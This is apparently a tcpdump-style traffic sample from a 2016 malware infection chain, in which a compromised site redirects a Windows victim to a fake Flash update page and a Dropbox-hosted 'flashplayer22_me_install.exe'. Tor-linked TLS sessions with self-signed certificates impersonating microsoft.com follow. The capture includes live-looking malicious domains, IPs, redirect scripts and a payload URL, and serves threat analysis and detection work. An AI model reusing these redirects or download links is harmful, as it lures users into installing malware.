Fake Adobe Flash Player Update Binary Loads Qadars & Tor Bot Malware PCAP file download Traffic Sample

2016-09-01 18:42:39.848166 IP 192.168.4.175.49440 > 82.194.88.80.80: Flags [P.], seq 1:250, ack 1, win 64800, length 249: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: sinlabajos.com
Connection: Keep-Alive

2016-09-01 18:42:40.094526 IP 82.194.88.80.80 > 192.168.4.175.49440: Flags [.], ack 250, win 15544, length 0
2016-09-01 18:42:42.211314 IP 82.194.88.80.80 > 192.168.4.175.49440: Flags [.], seq 1:1351, ack 250, win 15544, length 1350: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Thu, 01 Sep 2016 20:42:47 GMT
Server: Apache
Set-Cookie: 97c4d18b9c1b1386940bcf59303c3d2c=f84c33ffa7536c4fe576320400047d19; path=/; HttpOnly
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 01 Sep 2016 20:42:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
X-Powered-By: PleskLin
Content-Length: 7965
Connection: close
Content-Type: text/html; charset=utf-8

2016-09-01 18:42:45.303305 IP 192.168.4.175.49497 > 85.25.95.39.80: Flags [P.], seq 1:301, ack 1, win 16537, length 300: HTTP: GET /js/analytic.php?id=4 HTTP/1.1
GET /js/analytic.php?id=4 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://sinlabajos.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 4lmbkpqrklqv.net
Connection: Keep-Alive

2016-09-01 18:42:45.494614 IP 85.25.95.39.80 > 192.168.4.175.49497: Flags [.], ack 301, win 123, length 0
2016-09-01 18:42:48.726768 IP 85.25.95.39.80 > 192.168.4.175.49497: Flags [P.], seq 1:1229, ack 301, win 123, length 1228: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Thu, 01 Sep 2016 20:42:56 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips
X-Powered-By: PHP/5.4.45
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

2016-09-01 18:42:51.521801 IP 85.25.95.39.80 > 192.168.4.175.49497: Flags [P.], seq 1234:1603, ack 620, win 131, length 369: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Thu, 01 Sep 2016 20:42:56 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips
X-Powered-By: PHP/5.4.45
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

6c
window.open('http://adobe-secur-update.com/update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427', '_self');

2016-09-01 18:42:52.009085 IP 192.168.4.175.49510 > 69.64.36.212.80: Flags [P.], seq 1:311, ack 1, win 16537, length 310: HTTP: GET /update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427 HTTP/1.1
GET /update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: adobe-secur-update.com
Connection: Keep-Alive

<script>
setTimeout("location.href = 'https://www.dropbox.com/s/rj644igtfr503cs/flashplayer22_me_install.exe?dl=1';", 1000);
$(function() {

2016-09-01 19:01:27.398866 IP 192.168.4.175.50071 > 176.189.232.3.443: Flags [P.], seq 1:168, ack 1, win 16537, length 167
[TLS ClientHello, SNI: j8le7s5q745e.org]
2016-09-01 19:01:27.666128 IP 176.189.232.3.443 > 192.168.4.175.50071: Flags [P.], seq 1:80, ack 168, win 68, length 79
2016-09-01 19:01:27.666269 IP 192.168.4.175.50071 > 176.189.232.3.443: Flags [.], ack 80, win 16517, length 0
2016-09-01 19:01:27.849509 IP 176.189.232.3.443 > 192.168.4.175.50071: Flags [P.], seq 80:1121, ack 168, win 68, length 1041
[TLS Certificate, self-signed (issuer = subject): C=US, ST=US, L=NewYork, O=Private, OU=Private, CN=microsoft.com, emailAddress=private@sysprivpop.lkdd; notBefore 160411003559Z, notAfter 170411003559Z]
2016-09-01 19:01:27.849663 IP 192.168.4.175.50071 > 176.189.232.3.443: Flags [.], ack 1121, win 16257, length 0

2016-09-01 19:02:37.162264 IP 192.168.4.175.50073 > 62.75.207.97.443: Flags [S], seq 3405242436, win 8192, options [mss 1464,nop,wscale 2,nop,nop,sackOK], length 0
2016-09-01 19:02:37.438269 IP 62.75.207.97.443 > 192.168.4.175.50073: Flags [S.], seq 3326033908, ack 3405242437, win 14600, options [mss 1350,nop,wscale 6,nop,nop,sackOK], length 0
2016-09-01 19:02:37.438392 IP 192.168.4.175.50073 > 62.75.207.97.443: Flags [.], ack 1, win 16537, length 0
2016-09-01 19:02:37.438829 IP 192.168.4.175.50073 > 62.75.207.97.443: Flags [P.], seq 1:199, ack 1, win 16537, length 198
[TLS ClientHello, SNI: cfa8ed451f322249a33d9f877f75356c.konektyfor.com]
2016-09-01 19:02:37.631759 IP 62.75.207.97.443 > 192.168.4.175.50073: Flags [.], ack 199, win 245, length 0
2016-09-01 19:02:37.631878 IP 62.75.207.97.443 > 192.168.4.175.50073: Flags [.], seq 1:1351, ack 199, win 245, length 1350
[TLS ServerHello + Certificate, self-signed (issuer = subject): C=US, ST=US, L=NewYork, O=Private, OU=Private, CN=microsoft.com, emailAddress=private@sysprivpop.lkdd; notBefore 160411003559Z, notAfter 170411003559Z]
